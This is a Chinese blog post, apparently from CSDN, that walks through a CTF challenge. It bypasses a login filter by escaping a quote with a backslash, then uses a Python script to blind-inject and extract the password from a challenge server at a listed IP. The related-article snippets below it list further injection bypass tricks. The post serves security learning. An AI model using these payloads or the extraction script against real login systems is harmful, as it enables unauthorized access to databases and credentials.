SQL注入——使用转义符“\“

最新推荐文章于 2024-05-04 00:33:12 发布
最新推荐文章于 2024-05-04 00:33:12 发布
阅读量3.3k 收藏 6
点赞数 1
分类专栏: CTF 文章标签: sql python Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzu_lfl/article/details/129717185
版权

题目地址

打开题目是一个登录界面,尝试弱密码和万能密码但都不行(有很多过滤)。所以用爆破的方式看看都过滤了哪些字符。

使用burp抓包对用户名(或密码)进行爆破,发现用来闭合语句的单引号/双引号都被过滤了。那这里就没法用常规套路注入。此时就需要找其他方式,扫目录发现存在/robots.txt文件,里面显示还有一个/hint.txt文件。

hint.txt里面有一句sql语句,假设我们输入用户名:admin,密码:666,那么这个sql查询语句就会变成

select * from users where username='admin' and password='666';

此时由于单引号被过滤,但转义符”\“没有被过滤,”\“可以让原本的特殊字符失去功能变成纯文本,在编程语言中要想打印单引号就要在单引号前加上转义符”\“使其失去特殊含义。在这个sql语句中也可以通过”\“来让其中的单引号失去作用,从而创造出可注入的点。

select * from users where username='admin\' and password='666';
这里在admin后面加上一个'\'这样让admin后面的单引号失效,而admin前面的单引号就会自动找到666
前面的单引号配对,此时username的值就变成了"admin' and password="然后再在666后加上#把最后
的单引号注释掉,这样'666'就成为可以执行恶意语句的地方,构造恶意语句:
select * from users where username='admin\' and password='or 1 < 2#';

所以在登录界面输入用户名:admin\   密码:or 1<2#

此时页面回显变化说明注入成功了,但是由于"select"被过滤了,页面也只有两种回显,那么就只能进行盲注了。在hint.txt里面得知我们的目标是得到正确的password就能拿到flag,从sql语句中看出此时的操作就是在users表里面进行的,而我们要的列名就是password。所以可以编写python脚本进行盲注。

import requests

session = requests.Session()

def getPassword():
    password = ''
    for i in range(100):
        begin = 32
        end = 128
        mid = (begin + end) // 2
        while begin < end:
            payload = "or ascii(substr((password),%d,1)) > %d #" % (i, mid)
            paramPost = {"username":"admin\\","password":payload}
            response = session.post("http://123.60.47.130:23333/index.php",
                                    data = paramPost)
            if 'stronger' in response.text:
                begin = mid + 1
                mid = (begin + end) // 2
            else:
                end = mid
                mid = (begin + end) // 2
        password += chr(mid)
        print(password)

getPassword()

运行该脚本就可以得到password:OhyOuFOuNdit,而用户名就是admin。登录即可得到flag

Fox_light
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL】通配符及转义符
Qiuht的技术博客
10-09 926
sql中,在like操作符里,%代表一个或多个字符,而_代表一个(仅仅一个)字符。 SQL> create table qt1(name varchar2(10)); 表已创建。 SQL> insert into qt1 values('ABCD'); 已创建 1 行。 SQL> insert into qt1 values('_BCDE');
sql注入知识点
m0_55772907的博客
04-27 3611
1 Sqllab渗透测试天书 Microsoft英文文档 ORDER BY Clause (Transact-SQL) - SQL Server | Microsoft DocsSELECT - ORDER BY Clause (Transact-SQL)https://docs.microsoft.com/en-us/sql/t-sql/queries/select-order-by-clause-transact-sql?view=sql-server-ver152 Iwebsec靶场 判断字
SQL中的转义字符
12-14
之前写了篇文章《Oracle转义字符》,说到了Oracle中单引号“’”的转义字符是单引号“’”,那么其他的特殊字符转义字符又是什么呢,如模糊查询的占位符“%”,“_”等。   经过测试,在Oracle中不能再使用单引号“’”来转义“%”,“_”了,而是用反斜杠“”,不仅如此,还要声明反斜杠“”是转义字符。   假设表为tb,字段为col,要在col中查询包含“%”或“_”字符的字段,sql如下:   – Oracle   select * from tb where col like '%\%%' or col like '%\_%' escape ''   sql中“escap
SQL转义字符和通配符
最新发布
高性价比服务器就选:蓝易云
05-04 740
总结起来,在数据库查询语言SQL中,“转义”和“通道”就像是我们手上强大而灵活地工具——转义让我们能够安全地处理具有特殊含义和功能地数据;在编程语言中,有些字符具有特殊含义或功能,在某些情况下可能会导致错误或不期望的结果。在探索数据库的世界时,我们经常会遇到一些特殊的字符和符号,它们在SQL语句中起着至关重要的作用。它们是数据库查询语言中不可或缺的一部分,帮助我们更精确、更灵活地操作数据。在SQL中,通配符是用于替代任何其他字符或字符集的特殊字符。它们在LIKE操作符中使用,用于搜索数据库表格中的数据。
sql特殊字符转义
汤晓白的博客
07-25 7211
sql特殊字符转义&符号转义'单引号转义字段名为系统关键字 insert语句,在数据库中我们经常遇到字段名为关键字或者值含有特殊字符的,知识后需要转义处理,这里写一下我遇到的几个小的特殊字符转义。 &符号转义 &符号单独插入,结果是没有&符号的: 系统会提示&后面的作为变量的值为: 转义方法:&------》&& 两个&&a...
SQL查询中的转义字符
bitzhl的专栏
06-19 2254
 如果想查找“_cs”结尾的的账户select * from [user] where loginname like %_cs是不行的,_ 被认为是任意的字符,所以需要转义字符,有两种写法:select * from [user] where loginname like %[_]csselect * from [user] where loginname like
sql特殊符号转义
weixin_41977739的博客
11-10 3116
private String getSqlString(String string) { String[] split = string.split(","); String newStr = ""; for (String str : split) { newStr += ","; if (countStr(str, "'") % 2 == 1) { if (s.
SQL 转义字符
bai615_2011的专栏
05-26 2106
SQL转义字符是:'(单引号) 例:select * from tbl where uyear='''06' 请注意其中红色背景的单引号,它即表示转义字符,如果我们省略,则整个语句会出错,转义字符不会输出,上例中 uyear 的实际条件值为 '06,而不是 ''06 为什么不能省略呢,假如我们省略,上句变成:select * from tbl where uyear=''06' 由于在
sql注入总结
thinszx的博客
09-23 486
GBK宽字节注入 条件 数据库支持,并采用GBK格式进行编码 在获取url数据时,使用addslashes或是其他方式对单引号'进行了转义,使其变成了\',php的GET、POST等方法默认都会进行此操作 上面的两个条件缺一不可,gbk编码不太好确定,但是第二个比较好确认,例如输入的url为?id=1',返回了?id=1\' 利用 当遇到上述的两个反斜杠时,可以有以下两种思路: 把\也给转义掉,比如用三个斜杠\\\ gbk宽字节注入 gbk编码会把连续的两个字符视作是一个汉字字符,当且仅当第一个字符
SQL注入笔记(二)
要啥啥不行,偷懒第一名
07-22 1707
SQL注入的基本过程
SQL注入 引号转义绕过
Auroraxsn的博客
04-25 1万+
问题描述 做了一个靶场,注入点为数字类型,一开始一帆风顺,直到爆破列名的时候突然报错,页面突然就没了,毫无征兆...报错时的url如下: ?id=1 and 1=2 union select column_name,null,null,null,null from information_schema.columns where table_schema=database() and table_name="users" 查看源码: $sql="SELECT * FROM users wher
动态SQL语句/特殊符号转义
m0_61470267的博客
05-10 1537
原因:MyBatis 的一个强大的特性之一通常是它的动态 SQL 能力。 如果你有使用 JDBC 或其他相似框架的经验,你就明白条件地串联 SQL 字符串在一起是多么 的痛苦,确保不能忘了空格或在列表的最后省略逗号。 1. 动态查询 当where标签中有内容时,会动态的添加 where关键字。如果 where后面以and / or开头,会删除这些关键字 例:<where> <if test=''> SQL语句: <sel...
Oracle使用sqlplus登陆时密码口令有特殊字符‘@’进行转义登陆
wypjack的博客
07-04 3844
相信大部分朋友在设置oracle数据库的登陆口令时会设置的较复杂,今天就说一下在口令拥有特殊字符时如何进行转义登陆。   我是在Linux下进行sqlplus登陆的,不过基本都一样的。   在登陆时输入: sqlplus 'username/"password"'@service name 方式登陆就可以进行特殊字符转义,然后登陆啦。   其中''单引号将账号密码放置在内,""双引号...
mybatis特殊字符SQL注入
PJ码匠人
11-17 2万+
mybatis特殊字符SQL注入 字符转换 lt gt
一劳永逸 解决SQLPLUS 特殊符号转义
cjh2002519的博客
04-22 1313
由于我们一些监控SQL中常有$符号出现 所以我们需要在每个$前面加上反斜杠来转义 如下操作可以避免此情况 看红色部分 sqlplus -s scott/tiger@O11202<<\EOF select ...
【网安学习--SQL注入】详解成功搭建sqlilab靶场后第一关出现单引号被转义问题
qq_34831688的博客
08-20 1163
初学网络安全,搭建sql注入练习靶场,遇到的问题及解决办法
SQL 转义字符 单引号
热门推荐
jonnyha的博客
10-12 3万+
SET @sql = CONCAT('select * from table',' where in_time ','\'',iv_start_time,'\'',' order by ''批次'' limit ',iv_page_index,',',iv_page_size); ' \' ' 解析为' ' \" ' 解析为"
sql注入转义字符绕过
11-02
SQL注入是一种常见的攻击方式,攻击者通过在SQL语句中注入恶意代码来获取敏感信息或者控制数据库。而转义字符是一种防止SQL注入的常用手段,但是攻击者可以通过绕过转义字符来达到攻击的目的。以下是一些常见的绕过转义字符的方法: 1.使用双写绕过,例如将单引号'转义为'' 2.使用16进制编码绕过,例如将单引号'转义为\x27 3.使用注释符绕过,例如将单引号'转义为'/* 4.使用特殊字符绕过,例如将单引号'转义为%27

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值